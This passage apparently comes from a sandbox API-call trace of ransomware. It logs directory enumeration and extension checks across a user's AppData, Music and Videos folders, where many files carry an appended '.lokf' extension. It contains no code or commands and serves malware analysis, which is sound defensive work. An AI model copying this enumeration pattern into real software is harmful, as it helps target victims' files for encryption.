nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.322] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.322] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.322] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.322] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\") returned="IMJP12\\" [0148.322] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0148.322] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0148.322] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0148.322] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.322] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.322] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.322] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.322] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.323] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.323] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.323] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.324] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.324] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.324] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.324] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.324] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.325] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.325] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.325] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.325] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.326] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.326] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.326] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.326] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1318bd70, ftCreationTime.dwHighDateTime=0x1d4cee8, ftLastAccessTime.dwLowDateTime=0x217290f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x217290f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.329] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\010DT.wav.lokf") returned=".lokf" [0148.329] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\0rf9GWEzIubnTo8mKkZ.mp3.lokf") returned=".lokf" [0148.329] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\5t8t.wav.lokf") returned=".lokf" [0148.329] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\JL4xlRSqNe-Wd jJpi9J.wav.lokf") returned=".lokf" [0148.329] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\KnXQ3aRo433TX.m4a.lokf") returned=".lokf" [0148.329] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\OGyk 6D.m4a.lokf") returned=".lokf" [0148.329] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\OQFFt8mL.mp3.lokf") returned=".lokf" [0148.329] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\sviI.wav.lokf") returned=".lokf" [0148.329] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\y2sSLYuc0kUZqjX3V0a.wav.lokf") returned=".lokf" [0148.329] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.330] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.330] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.330] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\JkVomBM7vh9EmuD_aJp\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f10f590, ftCreationTime.dwHighDateTime=0x1d4d459, ftLastAccessTime.dwLowDateTime=0x2179b510, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x2179b510, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.332] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\JkVomBM7vh9EmuD_aJp\\0WbfV oRFZMhu.mp3.lokf") returned=".lokf" [0148.332] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\JkVomBM7vh9EmuD_aJp\\sKttn2.m4a.lokf") returned=".lokf" [0148.332] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\JkVomBM7vh9EmuD_aJp\\t_BQoltGh0ocw10QeS.wav.lokf") returned=".lokf" [0148.332] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\JkVomBM7vh9EmuD_aJp\\WsOPu73F.wav.lokf") returned=".lokf" [0148.332] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.333] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.338] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.338] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\ULJQyyPz2Ie5aZRk\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb499f670, ftCreationTime.dwHighDateTime=0x1d4d143, ftLastAccessTime.dwLowDateTime=0x2187fd50, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x2187fd50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.341] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\ULJQyyPz2Ie5aZRk\\2ZFt4M6QcsQkL8.wav.lokf") returned=".lokf" [0148.341] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\ULJQyyPz2Ie5aZRk\\gnUl.mp3.lokf") returned=".lokf" [0148.341] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\ULJQyyPz2Ie5aZRk\\jDMSBY8z.wav.lokf") returned=".lokf" [0148.341] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\ULJQyyPz2Ie5aZRk\\OcnaPENNojmBU3Ny_1f.mp3.lokf") returned=".lokf" [0148.341] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.341] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.341] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.342] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf63fb160, ftCreationTime.dwHighDateTime=0x1d4cfd5, ftLastAccessTime.dwLowDateTime=0x2198a6f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x2198a6f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.344] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\EjJOrnaIC80zrDKVf.mkv.lokf") returned=".lokf" [0148.344] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\l-4D7O.mkv.lokf") returned=".lokf" [0148.344] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\LVSDJY.avi.lokf") returned=".lokf" [0148.344] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\olMX62ll.avi.lokf") returned=".lokf" [0148.344] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\qj8V72.mp4.lokf") returned=".lokf" [0148.344] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\QnhLHVtA0q.flv.lokf") returned=".lokf" [0148.344] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\R-9wIEAszo.mkv.lokf") returned=".lokf" [0148.345] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\uGSi-5fGSlAWMRzpgA.mkv.lokf") returned=".lokf" [0148.345] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\VNkHkNF_CGKpIBona48.mkv.lokf") returned=".lokf" [0148.345] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\zezODkThIh8LWRpIgH.flv.lokf") returned=".lokf" [0148.345] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.345] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.345] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.345] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x21a95090, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x21a95090, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.347] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip.lokf") returned=".lokf" [0148.347] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages") returned="" [0148.347] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.348] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.348] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.348] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.349] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.349] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.349] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.349] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.352] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned="" [0148.352] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned="" [0148.352] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned="" [0148.352] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned="" [0148.352] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D") returned="" [0148.353] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D") returned="" [0148.353] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned="" [0148.353] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned="" [0148.353] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned="" [0148.353] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned="" [0148.353] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned="" [0148.353] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned="" [0148.353] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned="" [0148.353] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD") returned="" [0148.353] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned="" [0148.353] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned="" [0148.353] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned="" [0148.353] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned="" [0148.353] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned="" [0148.354] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned="" [0148.354] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned="" [0148.354] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned="" [0148.354] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned="" [0148.355] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned="" [0148.355] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned="" [0148.355] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned="" [0148.355] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned="" [0148.355] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned="" [0148.355] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned="" [0148.355] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS 